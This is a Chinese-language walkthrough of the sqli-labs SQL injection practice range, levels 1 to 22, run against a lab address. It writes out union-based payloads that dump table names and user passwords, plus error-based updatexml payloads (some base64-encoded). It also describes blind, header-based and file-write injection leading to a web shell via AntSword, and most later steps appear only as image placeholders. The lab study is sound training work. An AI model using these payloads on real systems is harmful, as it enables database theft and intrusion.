SQLI靶场进阶

第一关:

字符型
1、

http://192.168.101.199/sqli-labs-master/Less-1/
?id=1 and 1=2  //不报错,说明不是数字型

http://192.168.101.199/sqli-labs-master/Less-1/
?id=1' and 1=2  //报错,说明是字符型

SQLI靶场进阶_第1张图片
SQLI靶场进阶_第2张图片
2、进行列数的猜解

http://192.168.101.199/sqli-labs-master/Less-1/
?id=1' order by 3 --+

3、进行库名,表名,列名的爆出

http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,2,3  --+

http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,2,database()  --+

http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,2,group_concat(0x7e,table_name) from information_schema.tables where table_schema=database()  --+


http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,group_concat(0x7e,table_name),group_concat(0x7e,column_name) from information_schema.columns where table_schema=database()  --+

//进行users用户的密码爆出
http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,username,password from users  --+


第二关

数字型

//报错,说明是数字型
http://192.168.101.199/sqli-labs-master/Less-2/
?id=1 and 1=2

进行数据库,表,列的爆出【原理同字符型】

第三关

http://192.168.101.199/sqli-labs-master/Less-3/
?id=1 and 1=2  //不报错,证明不是数字型
http://192.168.101.199/sqli-labs-master/Less-3/
?id=1' and 1=2  

SQLI靶场进阶_第3张图片
报错信息中含有右括号,猜想可能与括号有关
SQLI靶场进阶_第4张图片
找到可以闭合的字符
SQLI靶场进阶_第5张图片
SQLI靶场进阶_第6张图片
进行库、表、列的爆出:
SQLI靶场进阶_第7张图片
SQLI靶场进阶_第8张图片
在这里插入图片描述
SQLI靶场进阶_第9张图片
SQLI靶场进阶_第10张图片

SQLI靶场进阶_第11张图片
SQLI靶场进阶_第12张图片
SQLI靶场进阶_第13张图片
发现有扩号,尝试闭合:

SQLI靶场进阶_第14张图片
进行列数的猜解,得到3列:
SQLI靶场进阶_第15张图片

SQLI靶场进阶_第16张图片
进行数据库名的获取:
SQLI靶场进阶_第17张图片
表名的获取:
SQLI靶场进阶_第18张图片
进行列名的信息获取:
SQLI靶场进阶_第19张图片
获取用户数据:

SQLI靶场进阶_第20张图片

五、

SQLI靶场进阶_第21张图片
SQLI靶场进阶_第22张图片
发现无回显,所以用bp来获取数据库信息:
SQLI靶场进阶_第23张图片
SQLI靶场进阶_第24张图片
SQLI靶场进阶_第25张图片
在这里插入图片描述
SQLI靶场进阶_第26张图片

SQLI靶场进阶_第27张图片
测试出存在注入
SQLI靶场进阶_第28张图片
数据库存在3列
SQLI靶场进阶_第29张图片
其他与第五关操作一致!

SQLI靶场进阶_第30张图片
在这里插入图片描述
SQLI靶场进阶_第31张图片

SQLI靶场进阶_第32张图片
源码中使用文件,所以利用文件来进行注入:
SQLI靶场进阶_第33张图片

SQLI靶场进阶_第34张图片

在这里插入图片描述
注意post必须大写小写是无法连接蚁剑的
在用蚁剑链接获取shell

SQLI靶场进阶_第35张图片
SQLI靶场进阶_第36张图片
SQLI靶场进阶_第37张图片SQLI靶场进阶_第38张图片

SQLI靶场进阶_第39张图片

SQLI靶场进阶_第40张图片

SQLI靶场进阶_第41张图片

SQLI靶场进阶_第42张图片

SQLI靶场进阶_第43张图片

SQLI靶场进阶_第44张图片

在进行注入测试时,无论输入怎样的闭合符号,页面均无变化,于是查看源码,发现是字符型的,使用单引号进行闭合;因为无论输入什么均无变化,使用时间盲注进行测试:
SQLI靶场进阶_第45张图片

SQLI靶场进阶_第46张图片

于是使用BP进行抓包处理:
SQLI靶场进阶_第47张图片

SQLI靶场进阶_第48张图片
其他同上!

在进行类型判断时,发现无论怎么输入,都没有任何的回显,所以利用sleep()来进行判断:
SQLI靶场进阶_第49张图片
SQLI靶场进阶_第50张图片
然后进行数据库的信息获取:
SQLI靶场进阶_第51张图片
利用BP抓包获取:
SQLI靶场进阶_第52张图片

其他同上!

十一、

SQLI靶场进阶_第53张图片
SQLI靶场进阶_第54张图片
SQLI靶场进阶_第55张图片

SQLI靶场进阶_第56张图片

SQLI靶场进阶_第57张图片
SQLI靶场进阶_第58张图片

十二、

SQLI靶场进阶_第59张图片
SQLI靶场进阶_第60张图片

SQLI靶场进阶_第61张图片
SQLI靶场进阶_第62张图片
SQLI靶场进阶_第63张图片

十三

SQLI靶场进阶_第64张图片

SQLI靶场进阶_第65张图片
发现此关是无回显的,进行抓包
SQLI靶场进阶_第66张图片

SQLI靶场进阶_第67张图片

SQLI靶场进阶_第68张图片
SQLI靶场进阶_第69张图片

SQLI靶场进阶_第70张图片
然后抓包获取用户名与密码!

十四

SQLI靶场进阶_第71张图片
SQLI靶场进阶_第72张图片
SQLI靶场进阶_第73张图片

SQLI靶场进阶_第74张图片
SQLI靶场进阶_第75张图片
SQLI靶场进阶_第76张图片
同上!

十五

SQLI靶场进阶_第77张图片

SQLI靶场进阶_第78张图片
其他同上!

十六

SQLI靶场进阶_第79张图片
SQLI靶场进阶_第80张图片
其他同上!

十七

SQLI靶场进阶_第81张图片

SQLI靶场进阶_第82张图片
发现order by 被禁止了
SQLI靶场进阶_第83张图片
SQLI靶场进阶_第84张图片
sleep函数也难逃一劫
然后进行报错注入的尝试
SQLI靶场进阶_第85张图片
SQLI靶场进阶_第86张图片

发现group让禁止了,所以只能使用limit来进行一一列举
SQLI靶场进阶_第87张图片
其他同上!

十八

SQLI靶场进阶_第88张图片
发现与我们的ua头一样,在看源码中对ua头的调用,所以进行抓包进行测试:

SQLI靶场进阶_第89张图片
SQLI靶场进阶_第90张图片
SQLI靶场进阶_第91张图片
其他同上!

十九

SQLI靶场进阶_第92张图片

SQLI靶场进阶_第93张图片
其他同上!

二十

SQLI靶场进阶_第94张图片
SQLI靶场进阶_第95张图片
其他同上!

二十一

SQLI靶场进阶_第96张图片

//base64加密payload
YWRtaW4xJyAgIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGxpbWl0IDAsMSkgKSwxKSAgYW5kICcg=

//payload 
admin1'   and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1) ),1)  and ' 

其他同上!

二十二

SQLI靶场进阶_第97张图片

SQLI靶场进阶_第98张图片

//base64 加密
YWRtaTFuIiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpKSwxKSBhbmQgIiAj
//payload
admi1n" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1) and " #

其他同上!

进阶2链接

你可能感兴趣的:(#,靶场与工具,安全)